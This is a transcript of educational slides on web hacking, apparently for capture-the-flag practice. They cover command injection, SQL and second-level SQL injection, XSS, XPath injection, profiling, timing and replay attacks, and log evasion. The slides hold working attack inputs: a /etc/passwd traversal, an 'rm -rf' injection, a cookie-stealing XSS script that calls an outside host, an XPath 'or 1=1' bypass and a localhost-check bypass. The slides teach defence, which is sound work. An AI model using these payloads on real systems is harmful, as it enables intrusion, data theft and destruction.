Crash Course in Web Hacking
Post on 17-Jan-2016
Transcript
Mike Gerschefske
Hacking is illegal (most of the time)
Understand the laws
Port scanning can be considered illegal
Post 9/11 it can be treated as an act of terrorism
DMCA exceptions: educational learning (at an institution)
Who cares about web hacking?
The days of buffer overflows and root boxes are nearing an end…
Non-executing stacks
People patching their systems
Everything is turning into a web system
Power of Google
Google knows all: SSNs, credit cards, backend SQL
http://johnny.ihackstuff.com/ghdb.php
Example dork: intitle:snc-rz30 inurl:home/
Robots.txt: don't put secrets in here
Power of the web browser
Is capable of HTTP GET/POST
Capable of sending any kind of GET/POST
Doesn't have to run client-side code (i.e. JavaScript)
Can send anything it wants to
Can be bad: url: http://somesite/index.php?section=Admin (vertical escalation)
Bad Code = Bad Security
You are not able to control the client end: cookies, POSTs, GETs, session IDs, all data
Do not put the user level (admin, user, etc.) in them (vertical escalation)
Do not put the user id in them (horizontal escalation)
Museum Example
Code from two years ago:

    #!/usr/bin/perl
    …
    use CGI qw(param);   # import assumed; it sits in the elided lines above
    $first = param('first');
    $last = param('last');
    $password = param('password');
    …
    # The original wrote (! $password eq "unbreakable"); ! binds tighter than eq in Perl,
    # so that test could never fire. ne is the comparison the check intends.
    if (($first eq "") || ($last eq "") || ($password ne "unbreakable")) {
        print "<p>Could not understand or wrong password!!</p>";
    }
    else {
        # Unsanitized parameters go straight into a shell command line: command injection
        system "cat ./museum_ideas/${first}.${last}";
    }
    …
Some Good Combinations
Dump the password file:
First Name: .
Last Name: /../../../../etc/passwd
Password: unbreakable
Delete the whole directory:
First Name: NOTEMPTY
Last Name: & rm -rf /home/museum/public_html/cgi_bin/museum_ideas
Password: unbreakable
Command Injection
This is the basic idea of command injection
Security through obscurity sometimes works
Some people are very diligent
SQL Injections
We can send commands, why not SQL?
What is SQL?
What can we do with SQL?
Get any data we want (that the DB user has access to)
Delete all the data the DB user has access to
If the DB user is root, dump the database
If the DB user is root, can upload and execute Java/C from the database and root the box
How to protect against it? Check parameters?
Not really…
Need to use SQL parameterization whenever at all possible: mark strings as strings, ints as ints
SELECT * WHERE name = @
Why doesn't checking params work? If you're really smart it will, but if you don't understand the problem it won't
This is a very difficult problem to understand
Example: http://viva/ictf/index.php/SQL_Injection
The problem is that the ' (apostrophe) is a special character
To fix it we just find and replace all apostrophes with two '' as that's how we insert apostrophes in a string. NO!
Second-Level SQL Injection
The problem actually isn't solved, just more complicated
Take:
Username = ' OR 'a' = 'a
SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''
Goes in fine, but coming out…
Get the username from the DB and put it in a var
The var contains SQL
We TRUST the DB to give us good data
Create another SQL query and the second one is now vulnerable
SELECT content FROM database WHERE username = VUNSQL
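The second-level injection above as an added worked example (not from the original slides): it uses Python's sqlite3 with constructed users/content tables, stores the escaped username from the slides, reads it back, and shows the doubled-apostrophe "fix" failing on the second query while a bound parameter holds.

```python
import sqlite3

# Constructed sample data: a user whose name is the injection string from the slides.
INJECTED_NAME = "' OR 'a' = 'a"


def escape_quotes(value: str) -> str:
    """The 'fix' from the slides: double every apostrophe before building SQL by hand."""
    return value.replace("'", "''")


def setup_db() -> sqlite3.Connection:
    """In-memory DB with a users table and a content table (constructed, hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(username TEXT);
        CREATE TABLE content(username TEXT, body TEXT);
        INSERT INTO content VALUES ('alice', 'alice private notes');
        INSERT INTO content VALUES ('bob', 'bob private notes');
        """
    )
    # First query: the escaped value goes in fine, exactly as the slides say.
    conn.execute(
        "INSERT INTO users(username) VALUES ('%s')" % escape_quotes(INJECTED_NAME)
    )
    return conn


def content_for_user_concat(conn, username_from_db: str) -> list:
    """Second query built by string concatenation: trusts data that came out of the DB."""
    sql = "SELECT body FROM content WHERE username = '%s'" % username_from_db
    return [row[0] for row in conn.execute(sql)]


def content_for_user_param(conn, username_from_db: str) -> list:
    """Hardened form: a bound parameter is always treated as a string, never as SQL."""
    sql = "SELECT body FROM content WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username_from_db,))]


def demo() -> tuple:
    """Returns (stored username, rows leaked by concatenation, rows from the parameterized query)."""
    conn = setup_db()
    # Reading the username back undoes the doubling: the raw payload is back in a var.
    (stored,) = conn.execute("SELECT username FROM users").fetchone()
    return stored, content_for_user_concat(conn, stored), content_for_user_param(conn, stored)
```

The concatenated second query becomes `... WHERE username = '' OR 'a' = 'a'` and returns every user's content; the parameterized one returns nothing because no user is literally named that.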
XSS – Cross Site Scripting
Malicious injection of JavaScript
Cookie hijacking
MySpace – Samy worm: replicated itself, added friends
Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html
<script>
document.write("<img src=http://site.com/a.jpg?cookie=" + document.cookie)
</script>
XPath Injection
//user[name/text() = '' or 1=1 or '' and password/text() = 'junk']
Used with: XML-RPC, SOAP/WSDL
IDS Will Find You
SQL/command injection is very easy to detect
IDS is poor at handling packet fragmentation combined with timing attacks
Profiling
Need to know what you're attacking
Can search for exploits
HEAD / HTTP/1.0 example: everyone's a little different
Nmap is a good profiler
Nessus will profile too
Tools
Add N Edit Cookies – Mozilla Firefox extension
TamperData – Firefox
Modify Headers – Firefox
Wget, Curl, Netcat/Telnet
Proxies: Paros Proxy (free), Fiddler (Microsoft, free), Spike (free)
Timing Attacks
Breaking authentication: a wrong username-and-password pair may take x time, while a username that doesn't exist takes y time
Successful timing attacks exist against encryption
ASP.NET Exploit
Debugging (source code) only available to localhost
Bypass this check by sending the following: GET http://localhost/bleh.asp?a=j HTTP/1.0
It checks the server name variable rather than the remote address
Mod_security
http://www.modsecurity.org/
Replay Attacks
Scorebot deletes flag, scorebot adds flag
Since the scorebot goes to everyone, we have the delete and add sequence
Can potentially replay the same delete sequence across all enemy servers
Log Evasion
Many logs only log ~4K of the URL
Prevents a DoS from filling up the logs
If the payload is at the end of the 4K, the malicious payload won't be logged
http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD
Application ignores the foo parameter
Log shows up as GET /page.asp …
Not just IIS: Sun ONE App Server too